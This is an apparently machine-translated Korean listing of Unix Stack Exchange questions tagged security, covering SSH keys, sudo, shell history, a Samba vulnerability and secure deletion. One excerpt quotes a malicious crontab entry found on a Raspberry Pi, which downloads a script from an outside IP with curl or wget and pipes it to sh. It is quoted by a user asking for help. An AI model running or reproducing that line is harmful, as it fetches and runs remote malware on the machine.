«security» 태그된 질문

회사의 준비 및 라이브 서버를 배포 루프에 연결하기 위해 서버에 액세스해야합니다. 측면의 관리자가 두 인스턴스를 설정 한 다음 서버에 사용자를 만들어 SSH로 연결할 수 있도록했습니다. 이것에 익숙합니다. 내 마음에 지금 일어날 일은 공개 키를 전송하여 승인 된 키 폴더 안에 넣을 수 있다는 것입니다. 그러나 그들은 나에게 파일 id_rsa내부 -----BEGIN …

73 ssh  security  key-authentication  administration 

rapid7 기사 에 따르면 Linux 시스템에서 원격 코드 실행을 허용하는 취약한 Samba 버전이 있습니다. 그동안 WannaCry의 ransomworm는 Windows 시스템의 영향을 분명 개선 단계를 쉽게 식별되었으며, 삼바 취약점은 리눅스와 유닉스 시스템에 영향을 미칠 것이며, 취득 또는 적절한 재조정을 배포에 중요한 기술적 장애물을 제시 할 수있다. CVE-2017-7494 3.5.0 이상의 모든 Samba 버전은 …

73 linux  security  linux-kernel  samba 

내 컴퓨터는 서버이므로 서버에 대한 연결을 무시하고 싶습니다 (예 : 누군가 내 웹 사이트를 방문 할 때). 서버에서 다른 장소로 연결 / 요청하는 것만 보고 싶습니다 . 나가는 연결 만 보려면 어떻게합니까 ? 편집 : 나는 이런 종류의 것들을 처음 사용합니다. 내가하려고하는 것은 내 웹 응용 프로그램의 데이터 이외의 서버에서 …

71 command-line  networking  shell-script  security 

얼마 전에 curl커맨드 라인 인수로 지정된 사용자 이름과 비밀번호 가 ps출력에 나타나지 않는다는 것을 알았습니다 (물론 bash 기록에 나타날 수도 있습니다). 마찬가지로에 표시되지 않습니다 /proc/PID/cmdline. (그러나 결합 된 username / password 인수의 길이는 파생 될 수 있습니다.) 아래 데모 : [root@localhost ~]# nc -l 80 & [1] 3342 [root@localhost ~]# …

68 security  password  curl  ps  arguments 

서버에 약간의 문제가 있습니다. 우리는 일부 사용자 sudo가 루트 권한을 가질 수 있기를 원 하지만 사용자가 루트 비밀번호를 변경할 수 없다는 제한이 있습니다. 즉, 다른 사용자가 무엇을 하든지 서버에 로그인하여 루트가 될 수 있다는 보장입니다. 가능합니까?

66 ubuntu  security  sudo 

기록에 명령이 추가되지 않도록하는 방법이 있습니까? 내 히스토리 파일에서 제외하고 싶은 명령이 있으며 메모리에 저장된 히스토리를 검색 할 때 실제로 신경 쓰지 않아도됩니다. 이것을 막을 수있는 방법이 있습니까, 아니면 돌아가서 내 기록 파일을 편집해야합니다. 업데이트 : 이것이 쉘에 따라 다를 수 있다는 것을 몰랐습니다. 내 껍질은 zsh입니다. 다른 쉘에 대한 …

65 bash  security  zsh  command-history 

현재 유지 관리 및 업그레이드를 위해 정기적으로 서버에 액세스해야하는 여러 조직에서 원격으로 작업하고 있습니다. .ssh/authorized_keys비밀번호를 조회하지 않고도 훨씬 더 빠르게 로그인 할 수 있도록 RSA 공개 SSH 키를 파일 에 추가하는 것이 안전 합니까? 공개 키에서 개인 키를 생성하는 것이 불가능하다는 가정하에 운영되지만 내 가정이 맞습니까? 한 단계 더 나아가면 …

60 ssh  security  key-authentication 

이 안내서를 읽은 후 일부 폴더 (예 : /var및 /home)를 별도의 파티션 으로 이동하려고합니다 . 3.2.1 지능형 파티션 구성표 선택 이 안내서에 따라 하나의 폴더를 성공적으로 이동할 수있었습니다 . 그러나 여러 폴더에서 작동하지 않는 것 같으며 모든 폴더가 적절한 폴더없이 파티션에 덤프됩니다. , 및 별도의 파티션에 마운트 /var하고 싶습니다 . …

59 debian  security  partition  fstab 

내 Raspberry Pi의 루트 crontab 파일에 무언가를 추가하고 싶었고 의심스러운 것 같은 항목을 발견하여 Google에서 일부를 검색해도 아무것도 나타나지 않았습니다. Crontab 항목 : */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh 내용 http://103.219.112.66:8000/i.sh은 다음 과 같습니다. export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" …

58 security  cron  malware 

나는 Chromium을 다음과 같이 실행하고 있습니다. chromium --no-sandbox OpenVZ VM Container에서 Debian Squeeze를 실행하고 있기 때문에이 작업을 수행 할 수 있습니다. 나는 이것을 계속 읽고 있지만 끔찍하다 . 그러나 나는 왜 정확한지 알고 싶다. 누군가 나에게 설명해 줄 수 있습니까? 누군가 해킹을 위해 컴퓨터를 해킹해야합니까? 아니면 JavaScript 파일과 같은 웹 …

54 security  chrome  browser  sandbox 

이것은 다른 무엇보다 유휴 호기심입니다. 제 친구가 저에게 '리눅스에서만 루트 만 사용할 수있는 포트 범위는 무엇입니까?' 나는 그에게 0-1024가 제한되어 있다고 말했다. 그리고 그는 왜 그런지 물어 보았는데 ... 전혀 몰라 이러한 포트가 제한되고 1025-65535가 제한되지 않은 이유가 있습니까? 대부분의 주요 네트워크 서비스 (HTTP, FTP, SSH, Telnet, HTTPS, POP, SMTP …

53 networking  security  root  tcp 

내 .muttrc 파일과 같은 형태 이 하나 또는 살짝 아래를 참조하십시오. 비밀번호를 망설입니다. 암호를 함께 사용하려면 어떻게 저장해야 mutt합니까? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"

52 security  mutt 

.pemAWS에서 프라이빗 키를 생성하고 다운로드했습니다 . 그러나 퍼티를 사용하여 가상 머신에 연결하려면 해당 키의 .ppk형식 이 있어야 합니다. 변환 과정은 대략 20 줄로 자세히 설명되어 있습니다. http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Linux Mint (Ubuntu 배포판)를 사용하고 있으며 터미널에서 puttygen을 사용할 수 있다는 것을 알고 있습니다. 그러나이 도구를 사용하는 방법이나 필요한 매개 변수를 구성하는 방법을 …

49 ssh  linux-mint  security  putty  amazon-ec2 

45136 / tcp 및 37208 / udp의 두 포트를 수신하는 프로세스가 있습니다 (실제로 동일한 프로세스라고 가정합니다). 그러나 netstat는 pid를 반환하지 않습니다. netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - "grep 37208"와 동일한 결과입니다. 나는 lsof도 시도했다 : lsof -i TCP:45136 그러나 아무것도 반환하지 않습니다. 스퀴즈의 새로운 …

47 networking  security  process 

Linux 'shred'유틸리티로 파쇄하려는 디렉토리 트리가 있습니다. 불행히도 파쇄에는 -R재귀 파쇄 옵션 이 없습니다 . 전체 디렉토리 트리를 재귀 적으로 파쇄하려면 어떻게해야합니까?

47 security  rm  data-destruction